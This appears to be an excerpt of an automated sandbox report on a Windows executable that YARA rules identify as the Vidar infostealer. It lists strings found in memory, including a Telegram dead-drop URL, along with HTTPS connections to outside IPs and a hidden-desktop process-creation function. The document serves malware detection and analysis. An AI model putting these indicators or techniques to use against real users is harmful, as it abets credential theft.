                  Source: aD7D9fkpII.exe, aD7D9fkpII.exe, 00000005.00000003.2074093950.000000000158B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001557000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000003.2074017300.000000000157E000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2770513290.000000000044D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                  Source: aD7D9fkpII.exe, 00000005.00000003.2074093950.000000000158B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael#
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael)
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael=
                  Source: aD7D9fkpII.exe, 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: chrome.exe, 0000000B.00000002.2326171667.00001E9000A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                  Source: aD7D9fkpII.exe, 00000005.00000003.2074093950.000000000158B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001557000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2770513290.000000000044D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, CTJWTJ.5.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                  Source: chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                  Source: chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: chrome.exe, 0000000B.00000002.2324679295.00001E90006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                  Source: chrome.exe, 0000000B.00000002.2326962003.00001E9000CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                  Source: chrome.exe, 0000000B.00000002.2325387457.00001E900080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharPk3
                  Source: chrome.exe, 0000000B.00000002.2328568588.00001E900105C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                  Source: chrome.exe, 0000000B.00000002.2328840965.00001E9001154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                  Source: content.js.16.dr, content_new.js.16.drString found in binary or memory: https://www.google.com/chrome
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327786774.00001E9000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325825077.00001E9000950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327786774.00001E9000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325825077.00001E9000950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                  Source: aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324320383.00001E900058C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285841265.00001E9002748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285960979.00001E9002764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                  Source: chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                  Source: chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                  Source: chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                  Source: chrome.exe, 0000000B.00000002.2326203186.00001E9000A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                  Source: chrome.exe, 0000000B.00000002.2322505965.00001E900001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                  Source: chrome.exe, 0000000B.00000003.2284741564.00001E900288C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                  Source: chrome.exe, 0000000B.00000003.2287270341.00001E90026B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334445315.00001E900280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285841265.00001E9002748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285960979.00001E9002764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2284741564.00001E900288C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                  Source: chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                  Source: chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326962003.00001E9000CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                  Source: chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327305685.00001E9000D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                  Source: chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327098835.00001E9000D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322774223.00001E90000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                  Source: chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlbag
                  Source: chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlncmN?
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ty
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00407060 strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,strlen,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,5_2_00407060

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 5.2.aD7D9fkpII.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 5.2.aD7D9fkpII.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008710000_2_00871000
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_008887410_2_00888741
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_0088E9300_2_0088E930
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_0089BA420_2_0089BA42
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00889B400_2_00889B40
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00883CDF0_2_00883CDF
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00899C730_2_00899C73
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_008710002_2_00871000
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_008887412_2_00888741
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_0088E9302_2_0088E930
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_0089BA422_2_0089BA42
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00889B402_2_00889B40
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00883CDF2_2_00883CDF
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00899C732_2_00899C73
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_004054A05_2_004054A0
